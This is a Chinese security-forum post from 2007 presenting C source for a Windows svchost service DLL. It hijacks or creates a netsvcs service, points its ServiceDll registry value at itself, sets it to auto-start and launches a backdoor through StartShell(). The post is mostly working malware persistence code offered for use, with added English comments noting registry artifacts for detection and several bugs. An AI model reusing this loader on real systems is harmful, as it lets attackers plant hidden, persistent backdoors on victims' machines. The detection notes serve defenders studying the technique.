
SVCHOST启动技术

www.8tops.com 2007-10-6 10:19:05   发布:尼奥
媒体:邪恶八进制信息安全团队  作者:dream2fly.


//说明:大部分代码来自bingle的文章,感谢bingle,并加入装载自启动代码
//感谢使用,欢迎光临白帽子实验室http://www.dream2fly.net/forum
Code Language : C

// Service-control state shared by ServiceMain, TellSCM and ServiceHandler.
// hSrv is the status handle ServiceMain gets from RegisterServiceCtrlHandler;
// TellSCM reports every state through it. dwCurrState caches the last state
// passed to TellSCM so ServiceHandler can answer SERVICE_CONTROL_INTERROGATE.
// Plain globals, no synchronisation.
SERVICE_STATUS_HANDLE hSrv;
DWORD dwCurrState;
// Forward declaration: report a service state to the Service Control Manager.
// Defined further down; see TellSCM for the fields it fills in.
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
// Start or stop the configured service by spawning "net start <name>" /
// "net stop <name>" as a hidden child process instead of talking to the SCM
// directly. Only SERVICE_CONTROL_CONTINUE and SERVICE_CONTROL_STOP are
// recognised; any other dwCommand leaves the prefix empty, so CreateProcess is
// handed just the bare service name.
// Always returns 0 — the caller cannot tell whether the spawn succeeded; the
// outcome only goes to OutputString (a helper defined elsewhere).
//
// Defender's note: a service DLL spawning net.exe with start/stop for its own
// service name is an observable side effect of this sample.
int ControlService(DWORD dwCommand)
{
    char cmd[MAX_PATH] = {0};
    if (dwCommand == SERVICE_CONTROL_CONTINUE)
    {
        strcpy(cmd, "net start ");
    }
    else if(dwCommand == SERVICE_CONTROL_STOP)
    {
        strcpy(cmd, "net stop ");
    }
    // Unbounded append: stServiceCfg.szSvcName is defined elsewhere and its
    // maximum length is not visible on this page.
    strcat(cmd, stServiceCfg.szSvcName);

    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    memset(&si,0,sizeof(si));
    si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    si.wShowWindow=SW_HIDE; // child window hidden
    if(!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
        OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
    else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);
    // pi.hProcess / pi.hThread are never closed on the success path (handle leak).

    return 0;
}
// Re-point an existing member of svchost's "netsvcs" group at this DLL.
//
// Steps, all under HKEY_LOCAL_MACHINE:
//   1. read SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs and
//      require stServiceCfg.szSvcName (defined elsewhere) to be listed;
//   2. set SYSTEM\CurrentControlSet\Services\<name>\Start = 2 (auto start);
//   3. set ...\Services\<name>\Parameters\ServiceDll to this module's own path
//      (GetModuleFileName on hDll, a global defined elsewhere);
//   4. request a start through ControlService ("net start <name>").
// The previous ServiceDll value is not saved anywhere; RecoverService writes a
// hard-coded path back instead. Always returns 0, even when a step failed —
// errors are only visible through OutputString/LogToFile (helpers defined
// elsewhere).
//
// Defender's note: the durable artifacts are the Start value and the
// Parameters\ServiceDll value of a netsvcs member pointing at a DLL outside
// the normal system location. Value-set auditing on those keys, and comparing
// every netsvcs member's ServiceDll against a known-good baseline, is how this
// technique is caught.
int ReplaceService()
{
    int rc = 0;
    HKEY hKey = 0;

    // Error convention inside the try block: store the registry return code
    // with SetLastError, then throw a C string naming the failed call; an empty
    // string means "already reported, just unwind". The catch reads
    // GetLastError(), so the SetLastError/throw order matters.
    // NOTE(review): a string literal is const char* in standard C++, which
    // catch(char *) does not match; this relies on a compiler extension
    // (old MSVC accepted it) — confirm with the toolchain in use.
    try{
        char buff[500];

        //query svchost setting
        char *ptr, *pSvchost = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
            throw "";
        }

        // netsvcs is treated as a double-NUL-terminated multi-string; `type` is
        // fetched but never checked. `size` is in/out: a value longer than 500
        // bytes makes the query fail rather than truncate.
        DWORD type, size = sizeof buff;
        rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
        RegCloseKey(hKey);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegQueryValueEx(Svchost\\netsvcs)";

        // Walk the multi-string one entry at a time; case-insensitive match.
        for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
            if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;

        // ptr rests on the terminating empty string when nothing matched.
        if(*ptr == 0)
        {
            OutputString("you specify service name not in Svchost\\netsvcs, must be one of following:");
            for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
                OutputString(" - %s", ptr);
            throw "";
        }

        //config service
        // strncpy with the full buffer size NUL-pads; the strcat that follows is
        // unbounded — whether buff can overflow depends on the maximum length
        // of szSvcName, which is not visible here.
        strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
        strcat(buff, stServiceCfg.szSvcName);
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            // (message says KEY_SET_VALUE; the open above asked for KEY_ALL_ACCESS)
            OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
            throw "";
        }

        DWORD dwValue = 2;//auto start (SERVICE_AUTO_START)
        rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(start)";

        // This module's own path becomes the new ServiceDll.
        char szDllPath[MAX_PATH] = {0};
        if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
            throw "GetModuleFileName() get dll path";

        // LogToFile is defined elsewhere; called with two arguments here and one
        // in RecoverService, so presumably printf-style.
        LogToFile(szDllPath, GetLastError());

        // hKey is reassigned without closing the Services\<name> handle opened
        // above — that handle leaks; only the Parameters handle is closed at exit.
        strcat(buff, "\\Parameters");
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
            throw "";
        }
        rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(ServiceDll)";


        OutputString("Config service %s ok.", stServiceCfg.szSvcName);
    }
    catch(char *str)
    {
        // Non-empty message: report it together with the last-error value that
        // was set just before the throw.
        if(str && str[0])
        {
            rc = GetLastError();
            OutputString("%s error %d", str, rc);
        }
    }

    // Closes whichever handle hKey holds last (0 if nothing was opened).
    RegCloseKey(hKey);

    // start the service
    // Runs even when the configuration above failed part-way.
    ControlService(SERVICE_CONTROL_CONTINUE);

    return 0;
}
// Undo ReplaceService: set Services\<name>\Start back to 3 (manual start) and
// Parameters\ServiceDll to the hard-coded "%SystemRoot%\System32\qmgr.dll",
// then request a stop through ControlService ("net stop <name>").
//
// NOTE(review): the restore path is fixed, not the value that was present
// before ReplaceService ran, so it is only right if the hijacked netsvcs
// member was originally hosted by qmgr.dll; any other service is left pointing
// at the wrong DLL. An incident responder restoring a machine should take the
// original ServiceDll from a known-good reference, not from this code.
// Always returns 0.
int RecoverService()
{
    int rc = 0;
    HKEY hKey = 0;

    // Same SetLastError/throw convention as ReplaceService; an empty string
    // means the error was already reported. catch(char *) matching a string
    // literal relies on a compiler extension (see ReplaceService).
    try{
        LogToFile("RecoverService");
        char buff[500];

        //config service
        // strncpy NUL-pads the whole buffer; the following strcat is unbounded
        // (length limit of szSvcName not visible on this page).
        strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
        strcat(buff, stServiceCfg.szSvcName);
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
            throw "";
        }

        LogToFile("RegSetValueEx");
        DWORD dwValue = 3;//manual start (SERVICE_DEMAND_START)
        rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(start)";

        // Hard-coded restore target; see the note in the header.
        char szDllPath[MAX_PATH] = {0};
        strcpy(szDllPath, "%SystemRoot%\\System32\\qmgr.dll");

        // As in ReplaceService, hKey is reassigned without closing the
        // Services\<name> handle opened above (handle leak).
        strcat(buff, "\\Parameters");
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
            throw "";
        }
        rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(ServiceDll)";


        OutputString("RecoverService(%s) SUCCESS.", stServiceCfg.szSvcName);
    }
    catch(char *str)
    {
        if(str && str[0])
        {
            LogToFile(str);
            rc = GetLastError();
            OutputString("%s error %d", str, rc);
        }
    }

    RegCloseKey(hKey);

    // Note: most of this code comes from bingle's article (thanks to bingle);
    // the self-start loading code was added.
    // Thanks for using it; visit the White Hat Lab forum: http://www.dream2fly.net/forum

    // The stop request is sent even if the registry restore failed part-way.
    ControlService(SERVICE_CONTROL_STOP);
    return 0;
}
// Create a brand-new svchost-hosted service for this DLL.
//
// Steps:
//   1. require stServiceCfg.szSvcName to appear in the Svchost\netsvcs list
//      (same check as ReplaceService);
//   2. CreateService(<name>) as SERVICE_WIN32_SHARE_PROCESS / SERVICE_AUTO_START
//      with the image "%SystemRoot%\system32\svchost.exe -k netsvcs";
//   3. create Services\<name>\Parameters and set ServiceDll to this module's
//      own path (GetModuleFileName on the global hDll, defined elsewhere);
//   4. request a start through ControlService ("net start <name>").
//
// Return value: declared BOOL but returns rc, which is 0 on success and the
// last registry/Win32 error code otherwise — the opposite sense of a BOOL.
// Callers should treat 0 as success.
//
// NOTE(review): the name must already be in netsvcs for svchost to load it,
// yet CreateService presumably fails if a service of that name already exists
// — so this only works for a netsvcs entry whose service record is absent.
// Defender's note: the artifacts are a new service whose ImagePath is the
// shared svchost -k netsvcs and whose Parameters\ServiceDll points outside
// the normal system location.
BOOL InstallService()
{
    int rc = 0;
    // NOTE(review): hKey is never initialised (only hkParam is); if the first
    // RegOpenKeyEx fails, the RegCloseKey at the end sees whatever that call
    // left in it. The other functions on this page initialise it to 0.
    HKEY hKey, hkParam = 0;
    SC_HANDLE hscm = NULL, schService = NULL;

    // Same SetLastError/throw convention as ReplaceService; an empty string
    // means "already reported". catch(char *) matching a string literal relies
    // on a compiler extension (see ReplaceService).
    try{
        char buff[500];

        //query svchost setting
        char *ptr, *pSvchost = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost";
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
            throw "";
        }

        // Multi-string read; `type` unchecked, size is in/out (see ReplaceService).
        DWORD type, size = sizeof buff;
        rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
        RegCloseKey(hKey);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegQueryValueEx(Svchost\\netsvcs)";

        for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
            if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;

        if(*ptr == 0)
        {
            OutputString("you specify service name not in Svchost\\netsvcs, must be one of following:");
            for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
                OutputString(" - %s", ptr);
            throw "";
        }

        //create service
        // Open a handle to the SC Manager database.
        hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
        if (hscm == NULL)
            throw "OpenSCManager()";

        char *bin = "%SystemRoot%\\system32\\svchost.exe -k netsvcs";
        schService = CreateService(
            hscm, // SCManager database
            stServiceCfg.szSvcName, // name of service
            stServiceCfg.szSvcName, // service name to display
            SERVICE_ALL_ACCESS, // desired access
            SERVICE_WIN32_SHARE_PROCESS, // service type (shared svchost host)
            SERVICE_AUTO_START, // start type
            SERVICE_ERROR_NORMAL, // error control type
            bin, // service's binary
            NULL, // no load ordering group
            NULL, // no tag identifier
            NULL, // no dependencies
            NULL, // LocalSystem account
            NULL); // no password

        if (schService == NULL)
        {
            OutputString("CreateService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError());
            throw "";
        }
        OutputString("CreateService(%s) SUCCESS. Config it path %s", stServiceCfg.szSvcName, bin);

        // NOTE(review): both handles are closed here and again after the catch
        // block (double close on the success path); they are not reset to NULL.
        CloseServiceHandle(schService);
        CloseServiceHandle(hscm);


        //config service
        // Bounded append here (100 chars), unlike the strcat in ReplaceService
        // and RecoverService — the three should use one convention.
        strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
        strncat(buff, stServiceCfg.szSvcName, 100);
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
        {
            OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
            throw "";
        }

        // Parameters subkey is created (not just opened) since the service is new.
        rc = RegCreateKey(hKey, "Parameters", &hkParam);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegCreateKey(Parameters)";

        // buff is reused for this module's own path.
        if(!GetModuleFileName(HMODULE(hDll), buff, sizeof buff))
            throw "GetModuleFileName() get dll path";

        rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buff, strlen(buff)+1);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(ServiceDll)";

        OutputString("Config service %s ok.", stServiceCfg.szSvcName);
    }
    catch(char *str)
    {
        if(str && str[0])
        {
            rc = GetLastError();
            OutputString("%s error %d", str, rc);
        }
    }

    RegCloseKey(hKey);
    RegCloseKey(hkParam);
    CloseServiceHandle(schService);
    CloseServiceHandle(hscm);
    // Note: most of this code comes from bingle's article (thanks to bingle);
    // the self-start loading code was added.
    // Thanks for using it; visit the White Hat Lab forum: http://www.dream2fly.net/forum

    // start the service
    // Runs even when creation or configuration above failed.
    ControlService(SERVICE_CONTROL_CONTINUE);

    return rc;
}
// Delete the service record through the SCM, then request a stop via
// ControlService ("net stop <name>"). Returns 0 on success or the Win32 error
// of the failing SCM call.
//
// Uses structured exception handling — __try/__except(1), where 1 is
// EXCEPTION_EXECUTE_HANDLER, i.e. run the handler for any exception — rather
// than the C++ try/catch used by the other functions on this page.
//
// NOTE(review): the three early `return rc` statements inside __try skip the
// CloseServiceHandle calls below, so hscm (and, on the third, schService)
// leak. schService and hscm are also not initialised; if an exception is
// raised before they are assigned, the cleanup closes indeterminate values.
int UninstallService()
{
    int rc = 0;
    SC_HANDLE schService;
    SC_HANDLE hscm;

    __try{
        hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
        if (hscm == NULL)
        {
            OutputString("OpenSCManager() error %d", rc = GetLastError() );
            return rc;
        }

        // Only DELETE access is requested — enough for DeleteService.
        schService = OpenService(hscm, stServiceCfg.szSvcName, DELETE);
        if (schService == NULL)
        {
            OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
            return rc;
        }

        if (!DeleteService(schService) )
        {
            // (message is a copy of the OpenService one; it is DeleteService that failed)
            OutputString("OpenService(%s) error %d", stServiceCfg.szSvcName, rc = GetLastError() );
            return rc;
        }

        OutputString("DeleteService(%s) SUCCESS.", stServiceCfg.szSvcName);
    }
    __except(1)
    {
        OutputString("Exception Catched 0x%X", GetExceptionCode());
    }

    CloseServiceHandle(schService);
    CloseServiceHandle(hscm);

    // Stop request goes out after the handles are closed. Nothing on disk is
    // removed here; only the service record is deleted.
    ControlService(SERVICE_CONTROL_STOP);

    return rc;
}
// Entry point svchost calls for this service once it has loaded the DLL named
// in Parameters\ServiceDll (the export that exposes it is not on this page).
// Registers the control handler, reports START_PENDING then RUNNING to the
// SCM, and calls StartShell(), which is defined elsewhere.
//
// argv[0] is the service name, handed over as a wide string. The code first
// copies it as if it were ANSI and then overwrites the buffer with the
// wide-to-multibyte conversion; neither strncpy nor wcstombs guarantees a
// terminating NUL when the name fills all 256 bytes, so svcname can be left
// unterminated in that case.
void ServiceMain( int argc, wchar_t *argv[])
{
    char svcname[256];
    strncpy(svcname, (char*)argv[0], sizeof svcname); // original comment: it should be unicode, but if it's ansi we do it well
    wcstombs(svcname, argv[0], sizeof svcname);
    OutputString("SvcHostDLL: ServiceMain(%d, %s) called", argc, svcname);

    // ServiceHandler is __stdcall (DWORD), which is what LPHANDLER_FUNCTION
    // expects; the cast only silences the declaration mismatch. The narrow
    // name is passed — whether the build maps this call to the A or W variant
    // is not visible here.
    hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler );
    if( hSrv == NULL )
    {
        OutputString("SvcHostDLL: RegisterServiceCtrlHandler %S failed", argv[0]);
        return;
    }

    TellSCM( SERVICE_START_PENDING, 0, 1 );
    TellSCM( SERVICE_RUNNING, 0, 0 );

    StartShell();// payload entry point, defined elsewhere; the original comment calls it the backdoor (dream2fly.net)

    OutputString("SvcHostDLL: ServiceMain done");
    return;
}
// Report a state transition to the SCM through hSrv and remember it in
// dwCurrState (replayed by ServiceHandler on SERVICE_CONTROL_INTERROGATE).
//
// dwState    - SERVICE_* state to report.
// dwExitCode - value placed in dwWin32ExitCode.
// dwProgress - checkpoint counter; callers on this page pass 1 for *_PENDING
//              states and 0 once the state has settled.
// Returns SetServiceStatus's BOOL result (non-zero on success) as an int.
//
// NOTE(review): dwServiceType is reported as SERVICE_WIN32_OWN_PROCESS while
// InstallService creates the service as SERVICE_WIN32_SHARE_PROCESS (it runs
// inside a shared svchost). The two should agree — confirm which one is right
// for the shared host.
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
{
    SERVICE_STATUS srvStatus;
    srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
    srvStatus.dwCurrentState = dwCurrState = dwState;
    // Accepts stop, pause/continue and shutdown; all handled in ServiceHandler.
    srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
    srvStatus.dwWin32ExitCode = dwExitCode;
    srvStatus.dwServiceSpecificExitCode = 0;
    srvStatus.dwCheckPoint = dwProgress;
    srvStatus.dwWaitHint = 3000; // milliseconds the SCM is told to wait on a pending state
    return SetServiceStatus( hSrv, &srvStatus );
}
// SCM control callback registered in ServiceMain. Each control is acknowledged
// with the matching pending/settled state pair through TellSCM and logged via
// OutputString. Controls outside the five cases are ignored (no default).
//
// NOTE(review): nothing here tears down whatever StartShell() started in
// ServiceMain — STOP and SHUTDOWN only change the reported state, so any work
// StartShell left running would outlive the "stopped" report.
void __stdcall ServiceHandler( DWORD dwCommand )
{
    // not really necessary because the service stops quickly
    switch( dwCommand )
    {
    case SERVICE_CONTROL_STOP:
        TellSCM( SERVICE_STOP_PENDING, 0, 1 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_STOP");
        Sleep(10); // 10 ms between the pending and the stopped report
        TellSCM( SERVICE_STOPPED, 0, 0 );
        break;
    case SERVICE_CONTROL_PAUSE:
        TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_PAUSE");
        TellSCM( SERVICE_PAUSED, 0, 0 );
        break;
    case SERVICE_CONTROL_CONTINUE:
        TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_CONTINUE");
        TellSCM( SERVICE_RUNNING, 0, 0 );
        break;
    case SERVICE_CONTROL_INTERROGATE:
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_INTERROGATE");
        // Re-report the last state cached by TellSCM.
        TellSCM( dwCurrState, 0, 0 );
        break;
    case SERVICE_CONTROL_SHUTDOWN:
        OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_SHUTDOWN");
        // Shutdown goes straight to STOPPED without a pending report.
        TellSCM( SERVICE_STOPPED, 0, 0 );
        break;
    }
}